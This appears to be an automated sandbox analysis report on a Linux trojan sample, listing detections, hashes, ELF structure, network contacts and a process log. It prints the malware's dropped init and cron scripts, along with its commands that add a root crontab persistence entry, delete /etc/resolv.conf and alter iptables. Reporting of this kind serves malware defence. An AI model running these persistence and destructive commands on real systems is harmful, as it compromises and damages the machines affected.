Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
Scripting
2
At (Linux)
2
At (Linux)
2
Scripting
LSASS Memory1
System Network Configuration Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts2
At (Linux)
Logon Script (Windows)Logon Script (Windows)1
Hidden Files and Directories
Security Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Indicator Removal on Host
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
File Deletion
LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 727219 Sample: Linux4.7.elf Startdate: 21/10/2022 Architecture: LINUX Score: 88 56 109.202.202.202, 80 INIT7CH Switzerland 2->56 58 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->58 60 91.189.91.43, 443 CANONICAL-ASGB United Kingdom 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 Machine Learning detection for sample 2->66 68 Machine Learning detection for dropped file 2->68 11 Linux4.7.elf 2->11         started        13 systemd snapd-env-generator 2->13         started        15 systemd snapd-env-generator 2->15         started        signatures3 process4 process5 17 Linux4.7.elf 11->17         started        process6 19 Linux4.7.elf 17->19         started        file7 50 /tmp/.chinaz{1666327072, ELF 19->50 dropped 52 /etc/init.d/.chinaz{1666327072, POSIX 19->52 dropped 54 /etc/cron.hourly/cron.sh, POSIX 19->54 dropped 70 Drops invisible ELF files 19->70 72 Drops files in suspicious directories 19->72 74 Sample deletes itself 19->74 76 2 other signatures 19->76 23 Linux4.7.elf 19->23         started        25 Linux4.7.elf sh 19->25         started        27 Linux4.7.elf sh 19->27         started        29 8 other processes 19->29 signatures8 process9 process10 31 Linux4.7.elf update-rc.d 23->31         started        34 sh sed 25->34         started        36 sh iptables 27->36         started        38 Linux4.7.elf update-rc.d 29->38         started        40 sh rm 29->40         started        42 sh iptables 29->42         started        44 5 other processes 29->44 signatures11 78 Sample tries to persist itself using System V runlevels 31->78 46 update-rc.d systemctl 31->46         started        80 Sample tries to persist itself using cron 34->80 82 Executes the "iptables" command to insert, remove and/or manipulate rules 36->82 48 update-rc.d systemctl 38->48         started        process12
SourceDetectionScannerLabelLink
Linux4.7.elf61%VirustotalBrowse
Linux4.7.elf100%Joe Sandbox ML
SourceDetectionScannerLabelLink
/etc/init.d/.chinaz{1666327072100%Joe Sandbox ML
/etc/cron.hourly/cron.sh12%ReversingLabsLinux.Trojan.Xor
/etc/cron.hourly/cron.sh4%VirustotalBrowse
/etc/cron.hourly/cron.sh11%MetadefenderBrowse
/tmp/.chinaz{166632707261%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://www.gnu.org/software/libc/bugs.htmlLinux4.7.elf, .chinaz{1666327072.12.drfalse
    high
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    109.202.202.202
    unknownSwitzerland
    13030INIT7CHfalse
    91.189.91.43
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse
    91.189.91.42
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    109.202.202.202x86Get hashmaliciousBrowse
      b.plGet hashmaliciousBrowse
        LYlRe7xCgz.elfGet hashmaliciousBrowse
          vdBv52v29c.elfGet hashmaliciousBrowse
            lz47Kwn9w4.elfGet hashmaliciousBrowse
              untODBSHdU.elfGet hashmaliciousBrowse
                2D6T4RxWsP.elfGet hashmaliciousBrowse
                  q3fxVh4lKD.elfGet hashmaliciousBrowse
                    yrIynaCPxX.elfGet hashmaliciousBrowse
                      6BwKfmVfnJ.elfGet hashmaliciousBrowse
                        jSiutdCWH6.elfGet hashmaliciousBrowse
                          4ISX4nRn8l.elfGet hashmaliciousBrowse
                            7doYNAVZXK.elfGet hashmaliciousBrowse
                              zyj24000Get hashmaliciousBrowse
                                SecuriteInfo.com.ELF.Agent-BJI.15629.13420.elfGet hashmaliciousBrowse
                                  linuxx86tfGet hashmaliciousBrowse
                                    luyouGet hashmaliciousBrowse
                                      hPuwJZOl6z.elfGet hashmaliciousBrowse
                                        EOeZ6IAUXW.elfGet hashmaliciousBrowse
                                          9YTloFjr5K.elfGet hashmaliciousBrowse
                                            91.189.91.43x86Get hashmaliciousBrowse
                                              b.plGet hashmaliciousBrowse
                                                LYlRe7xCgz.elfGet hashmaliciousBrowse
                                                  vdBv52v29c.elfGet hashmaliciousBrowse
                                                    lz47Kwn9w4.elfGet hashmaliciousBrowse
                                                      untODBSHdU.elfGet hashmaliciousBrowse
                                                        2D6T4RxWsP.elfGet hashmaliciousBrowse
                                                          q3fxVh4lKD.elfGet hashmaliciousBrowse
                                                            yrIynaCPxX.elfGet hashmaliciousBrowse
                                                              6BwKfmVfnJ.elfGet hashmaliciousBrowse
                                                                jSiutdCWH6.elfGet hashmaliciousBrowse
                                                                  4ISX4nRn8l.elfGet hashmaliciousBrowse
                                                                    7doYNAVZXK.elfGet hashmaliciousBrowse
                                                                      zyj24000Get hashmaliciousBrowse
                                                                        SecuriteInfo.com.ELF.Agent-BJI.15629.13420.elfGet hashmaliciousBrowse
                                                                          linuxx86tfGet hashmaliciousBrowse
                                                                            luyouGet hashmaliciousBrowse
                                                                              hPuwJZOl6z.elfGet hashmaliciousBrowse
                                                                                EOeZ6IAUXW.elfGet hashmaliciousBrowse
                                                                                  9YTloFjr5K.elfGet hashmaliciousBrowse
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    CANONICAL-ASGBx86Get hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    b.plGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    LYlRe7xCgz.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    vdBv52v29c.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    lz47Kwn9w4.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    untODBSHdU.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    2D6T4RxWsP.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    q3fxVh4lKD.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    yrIynaCPxX.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    6BwKfmVfnJ.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    jSiutdCWH6.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    4ISX4nRn8l.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    7doYNAVZXK.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    zyj24000Get hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    SecuriteInfo.com.ELF.Agent-BJI.15629.13420.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    linuxx86tfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    luyouGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    hPuwJZOl6z.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    EOeZ6IAUXW.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    9YTloFjr5K.elfGet hashmaliciousBrowse
                                                                                    • 91.189.91.42
                                                                                    INIT7CHx86Get hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    b.plGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    LYlRe7xCgz.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    vdBv52v29c.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    lz47Kwn9w4.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    untODBSHdU.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    2D6T4RxWsP.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    q3fxVh4lKD.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    yrIynaCPxX.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    6BwKfmVfnJ.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    jSiutdCWH6.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    4ISX4nRn8l.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    7doYNAVZXK.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    zyj24000Get hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    SecuriteInfo.com.ELF.Agent-BJI.15629.13420.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    linuxx86tfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    luyouGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    hPuwJZOl6z.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    EOeZ6IAUXW.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    9YTloFjr5K.elfGet hashmaliciousBrowse
                                                                                    • 109.202.202.202
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    /etc/cron.hourly/cron.shtestGet hashmaliciousBrowse
                                                                                      chinazGet hashmaliciousBrowse
                                                                                        HuuyISbqrLGet hashmaliciousBrowse
                                                                                          BK86XsOVqXGet hashmaliciousBrowse
                                                                                            Process:/tmp/Linux4.7.elf
                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                            Category:dropped
                                                                                            Size (bytes):223
                                                                                            Entropy (8bit):4.756432444291805
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:htiy4Mrm9lVNy28XbCVP270gJdUiynrgns:RjwVNfGbWPirSR
                                                                                            MD5:B791B087B1795E3674A9AA765C76FC04
                                                                                            SHA1:B53F478234AE97F3CDBF2E7FE7EC68D687FEB7C1
                                                                                            SHA-256:1C1E9B69CF8021BF7CE1F60DCAA2D31C1E21ED4B6E474F3571DA81FFD5A9B69E
                                                                                            SHA-512:2DCC2E478C51CF8118306FD5C744AAD7147E368CBC4329DB1CC5FAC52088A7F3354079AE2B582B270495789E4FB4591538EC88BB5EA40EEC646F360BAC33BBB2
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 12%
                                                                                            • Antivirus: Virustotal, Detection: 4%, Browse
                                                                                            • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                            Joe Sandbox View:
                                                                                            • Filename: test, Detection: malicious, Browse
                                                                                            • Filename: chinaz, Detection: malicious, Browse
                                                                                            • Filename: HuuyISbqrL, Detection: malicious, Browse
                                                                                            • Filename: BK86XsOVqX, Detection: malicious, Browse
                                                                                            Reputation:low
                                                                                            Preview:#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/udev/udev /lib/udev/debug./lib/udev/debug.
                                                                                            Process:/tmp/Linux4.7.elf
                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                            Category:dropped
                                                                                            Size (bytes):355
                                                                                            Entropy (8bit):5.356178646000383
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hUtoFdU9uMw285dnsKheJjU589pBE21YJvmNeMwh2L585v1DzRIju8U6MzEu8w4:6tw2PjcsBEMO12L5ezuju9zEui
                                                                                            MD5:182066F30749E25A9AD34AF9619CF966
                                                                                            SHA1:2236D3790D5C3CAEF9F32D2270A71D8C71BFC4EF
                                                                                            SHA-256:5CDF68C5CD346BCBFF1C3E1FADDB2767E7C17889FB885FD7E1B72C92B34E3469
                                                                                            SHA-512:0B65093500B4592272FBD485650773A12FCE509CDF9DA1B4249BBFDC68FE49E5D7FFFB1618B46631291C8B02970D6C9518EEF68F377671BDE75B78BD84C39F66
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: CN_disclosed_20180208_lsls, Description: Detects malware from disclosed CN malware set, Source: /etc/init.d/.chinaz{1666327072, Author: Florian Roth
                                                                                            • Rule: Linux_Trojan_Xorddos_a6572d63, Description: unknown, Source: /etc/init.d/.chinaz{1666327072, Author: unknown
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Reputation:low
                                                                                            Preview:#!/bin/sh.# chkconfig: 12345 90 90.# description: .chinaz{1666327072.### BEGIN INIT INFO.# Provides:...chinaz{1666327072.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:..chinaz{1666327072.### END INIT INFO.case $1 in.start)../tmp/.chinaz{1666327072..;;.stop)..;;.*)../tmp/.chinaz{1666327072..;;.esac.
                                                                                            Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):76
                                                                                            Entropy (8bit):3.7627880354948586
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                            MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                            SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                            SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                            SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                            Process:/tmp/Linux4.7.elf
                                                                                            File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, BuildID[sha1]=307edfa923d9ff7e3793ec8771ab90f5343cb21e, stripped
                                                                                            Category:dropped
                                                                                            Size (bytes):1315556
                                                                                            Entropy (8bit):6.3900723016536505
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:8kUpotcUSzgtPLdOEG0V0JRzFB3ywyUZ1N2AhNdhBjh+hnPlVVW0Mk7t69Kx/ti8:MoKXwZOK0TFBCwy8P2AhNdhBjh+hnPlP
                                                                                            MD5:B6A59DA20064367D4A954123C69345DC
                                                                                            SHA1:2C8B614069440F2476415DD54E4B985C72BE3EEF
                                                                                            SHA-256:09BC639A0192CB829D74D3E64C0333BE46AA72F780A7A17EF2ADC072D7ED80B3
                                                                                            SHA-512:A1E2FA982D2802454CBAE652AAEC950859DE2DDA230C469EBAD2252709D47EFF924FD04EE9200D180DF4313FD9E01EDD31BE32C8542997CA2FDE5597F3CBDAB7
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Virustotal, Detection: 61%, Browse
                                                                                            Reputation:low
                                                                                            Preview:.ELF........................4...........4. ...(.................................................................................D...D.............................L...........Q.td........................................GNU.............................GNU.0~.#..~7..q...4<..p...*...t...*...x...*...|...*.......*.......*.......*...U..S........[........|.....t..~........D<..X[...%p...h..........%t...h..........%x...h..........%|...h..........%....h..........%....h..........%....h.........1.^....PTRh....h0...QVh......;.................U..S.d$.=`....uS......d...............9.s...t&.....d...........d...9.r.......t...$.....1....`.....d$.[]..t&.U.......d$......Z........t .T$..D$......D$.h.....$.....4..........t........t...$..............U..WVS....u..}...E...............1..E......E....)E.)E..7..&.......O..N.]............).k..)..a.....\.......t>.C.<.v.C.<.w:...O..N.]...........).k..)..A.....\.......u...[^_].f..................'....U1..1.V.u.S.]......t.f.................
                                                                                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, BuildID[sha1]=307edfa923d9ff7e3793ec8771ab90f5343cb21e, stripped
                                                                                            Entropy (8bit):6.3900723016536505
                                                                                            TrID:
                                                                                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                            File name:Linux4.7.elf
                                                                                            File size:1315556
                                                                                            MD5:b6a59da20064367d4a954123c69345dc
                                                                                            SHA1:2c8b614069440f2476415dd54e4b985c72be3eef
                                                                                            SHA256:09bc639a0192cb829d74d3e64c0333be46aa72f780a7a17ef2adc072d7ed80b3
                                                                                            SHA512:a1e2fa982d2802454cbae652aaec950859de2dda230c469ebad2252709d47eff924fd04ee9200d180df4313fd9e01edd31be32c8542997ca2fde5597f3cbdab7
                                                                                            SSDEEP:24576:8kUpotcUSzgtPLdOEG0V0JRzFB3ywyUZ1N2AhNdhBjh+hnPlVVW0Mk7t69Kx/ti8:MoKXwZOK0TFBCwy8P2AhNdhBjh+hnPlP
                                                                                            TLSH:8F556D1DF64344B5C837D17002CFEB7F8D24AA398017CA97AD8DDD39BCAB9A1690D612
                                                                                            File Content Preview:.ELF........................4...........4. ...(.....................................................................................D...D...............................L...........Q.td........................................GNU............................

                                                                                            ELF header

                                                                                            Class:
                                                                                            Data:
                                                                                            Version:
                                                                                            Machine:
                                                                                            Version Number:
                                                                                            Type:
                                                                                            OS/ABI:
                                                                                            ABI Version:
                                                                                            Entry Point Address:
                                                                                            Flags:
                                                                                            ELF Header Size:
                                                                                            Program Header Offset:
                                                                                            Program Header Size:
                                                                                            Number of Program Headers:
                                                                                            Section Header Offset:
                                                                                            Section Header Size:
                                                                                            Number of Section Headers:
                                                                                            Header String Table Index:
                                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                            NULL0x00x00x00x00x0000
                                                                                            .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                                            .note.gnu.build-idNOTE0x80480f40xf40x240x00x2A004
                                                                                            .rel.pltREL0x80481180x1180x380x80x2A054
                                                                                            .initPROGBITS0x80481500x1500x300x00x6AX004
                                                                                            .pltPROGBITS0x80481800x1800x700x00x6AX004
                                                                                            .textPROGBITS0x80481f00x1f00xf3bfc0x00x6AX0016
                                                                                            __libc_freeres_fnPROGBITS0x813bdf00xf3df00x18380x00x6AX0016
                                                                                            __libc_thread_freeres_fnPROGBITS0x813d6300xf56300x1fa0x00x6AX0016
                                                                                            .finiPROGBITS0x813d82c0xf582c0x1c0x00x6AX004
                                                                                            .rodataPROGBITS0x813d8600xf58600x1d5e40x00x2A0032
                                                                                            __libc_subfreeresPROGBITS0x815ae440x112e440x340x00x2A004
                                                                                            __libc_atexitPROGBITS0x815ae780x112e780x40x00x2A004
                                                                                            __libc_thread_subfreeresPROGBITS0x815ae7c0x112e7c0x80x00x2A004
                                                                                            .stapsdt.basePROGBITS0x815ae840x112e840x10x00x2A001
                                                                                            .eh_framePROGBITS0x815ae880x112e880x2843c0x00x2A004
                                                                                            .gcc_except_tablePROGBITS0x81832c40x13b2c40x40100x00x2A004
                                                                                            .tdataPROGBITS0x81882d40x13f2d40x140x00x403WAT004
                                                                                            .tbssNOBITS0x81882e80x13f2e80x380x00x403WAT004
                                                                                            .ctorsPROGBITS0x81882e80x13f2e80x280x00x3WA004
                                                                                            .dtorsPROGBITS0x81883100x13f3100xc0x00x3WA004
                                                                                            .jcrPROGBITS0x818831c0x13f31c0x40x00x3WA004
                                                                                            .data.rel.roPROGBITS0x81883200x13f3200xca00x00x3WA0032
                                                                                            .gotPROGBITS0x8188fc00x13ffc00xa40x40x3WA004
                                                                                            .got.pltPROGBITS0x81890640x1400640x280x40x3WA004
                                                                                            .dataPROGBITS0x81890a00x1400a00x9b40x00x3WA0032
                                                                                            .bssNOBITS0x8189a600x140a540xbb1c0x00x3WA0032
                                                                                            __libc_freeres_ptrsNOBITS0x819557c0x140a540x180x00x3WA004
                                                                                            .note.stapsdtNOTE0x00x140a540x23c0x00x0004
                                                                                            .commentPROGBITS0x00x140c900x2d0x10x30MS001
                                                                                            .shstrtabSTRTAB0x00x140cbd0x14e0x00x0001
                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                            LOAD0x00x80480000x80480000x13f2d40x13f2d46.39590x5R E0x1000.note.ABI-tag .note.gnu.build-id .rel.plt .init .plt .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .stapsdt.base .eh_frame .gcc_except_table
                                                                                            LOAD0x13f2d40x81882d40x81882d40x17800xd2c04.13520x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                                            NOTE0xd40x80480d40x80480d40x440x443.49240x4R 0x4.note.ABI-tag .note.gnu.build-id
                                                                                            TLS0x13f2d40x81882d40x81882d40x140x4c2.70370x4R 0x4.tdata .tbss
                                                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 21, 2022 04:37:54.049407005 CEST42836443192.168.2.2391.189.91.43
                                                                                            Oct 21, 2022 04:37:54.818620920 CEST4251680192.168.2.23109.202.202.202
                                                                                            Oct 21, 2022 04:38:09.408828020 CEST43928443192.168.2.2391.189.91.42
                                                                                            Oct 21, 2022 04:38:19.648184061 CEST42836443192.168.2.2391.189.91.43
                                                                                            Oct 21, 2022 04:38:25.792058945 CEST4251680192.168.2.23109.202.202.202
                                                                                            Oct 21, 2022 04:38:50.366693020 CEST43928443192.168.2.2391.189.91.42
                                                                                            Oct 21, 2022 04:39:10.845504045 CEST42836443192.168.2.2391.189.91.43

                                                                                            System Behavior

                                                                                            Start time:04:37:52
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:/tmp/Linux4.7.elf
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:52
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:52
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/sbin/update-rc.d
                                                                                            Arguments:update-rc.d Linux4.7.elf remove
                                                                                            File size:3478464 bytes
                                                                                            MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/sbin/update-rc.d
                                                                                            Arguments:n/a
                                                                                            File size:3478464 bytes
                                                                                            MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/systemctl
                                                                                            Arguments:systemctl daemon-reload
                                                                                            File size:996584 bytes
                                                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/sbin/update-rc.d
                                                                                            Arguments:update-rc.d .chinaz{1666327072 defaults
                                                                                            File size:3478464 bytes
                                                                                            MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/sbin/update-rc.d
                                                                                            Arguments:n/a
                                                                                            File size:3478464 bytes
                                                                                            MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/systemctl
                                                                                            Arguments:systemctl daemon-reload
                                                                                            File size:996584 bytes
                                                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:54
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/sed
                                                                                            Arguments:sed -i /\\/etc\\/cron.hourly\\/cron.sh/d /etc/crontab
                                                                                            File size:121288 bytes
                                                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c "rm -rf /etc/resolv.conf"
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:n/a
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                            Start time:04:37:55
                                                                                            Start date:21/10/2022
                                                                                            Path:/usr/bin/rm
                                                                                            Arguments:rm -rf /etc/resolv.conf
                                                                                            File size:72056 bytes
                                                                                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/tmp/Linux4.7.elf
                                                                                            Arguments:n/a
                                                                                            File size:1315556 bytes
                                                                                            MD5 hash:b6a59da20064367d4a954123c69345dc

                                                                                            Start time:04:37:56
                                                                                            Start date:21/10/2022
                                                                                            Path:/bin/sh
                                                                                            Arguments:sh -c whoami
                                                                                            File size:129816 bytes
                                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

